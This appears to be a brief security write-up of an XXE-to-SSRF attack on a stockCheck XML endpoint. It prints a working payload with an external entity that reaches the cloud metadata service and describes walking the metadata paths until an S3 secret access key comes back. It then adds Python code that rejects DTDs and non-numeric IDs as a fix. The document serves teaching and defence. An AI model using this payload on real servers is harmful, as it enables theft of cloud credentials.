We first identified the POST request that was passing data in XML format:

We then used the following payload to access the internal URL:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

After sending the request, we were able to observe the server’s response, which included a directory name from the metadata endpoint.

We continued by editing the payload, appending the directory name from each response to the URL.

Upon accessing the final endpoint, we successfully retrieved the secret access key of the associated S3 bucket:
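The request above works only because the server's XML parser accepts a DOCTYPE and resolves the external entity it declares. As an added example (not part of the original write-up and not the application's code), this sketch parses the same stockCheck body with Python's expat bindings, refuses any DTD before an entity can be resolved, and accepts only numeric IDs; the function and exception names are hypothetical.

```python
import re
from xml.parsers import expat

class RejectedXML(ValueError):
    """Request body refused before any entity could be resolved."""

# Sample bodies: BENIGN is constructed; WITH_DTD is the request shown above.
BENIGN = b"<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>"
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "http://169.254.169.254/">]>'
            b"<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>")

def parse_stock_check(body: bytes) -> tuple[int, int]:
    """Return (productId, storeId); hypothetical helper for this example."""
    fields, stack, text = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # A stock check never needs a DTD, so refuse it outright.
        raise RejectedXML("DOCTYPE declarations are not accepted")

    def on_start(name, attrs):
        stack.append(name)
        text.clear()

    def on_end(name):
        if stack[:-1] == ["stockCheck"]:      # direct child of the root
            fields[name] = "".join(text).strip()
        stack.pop()

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = text.append
    parser.EndElementHandler = on_end
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:           # malformed XML, undefined entity
        raise RejectedXML(f"malformed XML: {exc}") from None

    ids = []
    for key in ("productId", "storeId"):
        value = fields.get(key, "")
        if not re.fullmatch(r"[0-9]{1,9}", value):   # IDs are plain integers
            raise RejectedXML(f"{key} must be a number")
        ids.append(int(value))
    return ids[0], ids[1]

if __name__ == "__main__":
    print(parse_stock_check(BENIGN))
```

Rejecting the DOCTYPE is the parser-level control; the integer check on `productId` means that even a parser misconfigured to expand entities would not pass fetched content through to the response.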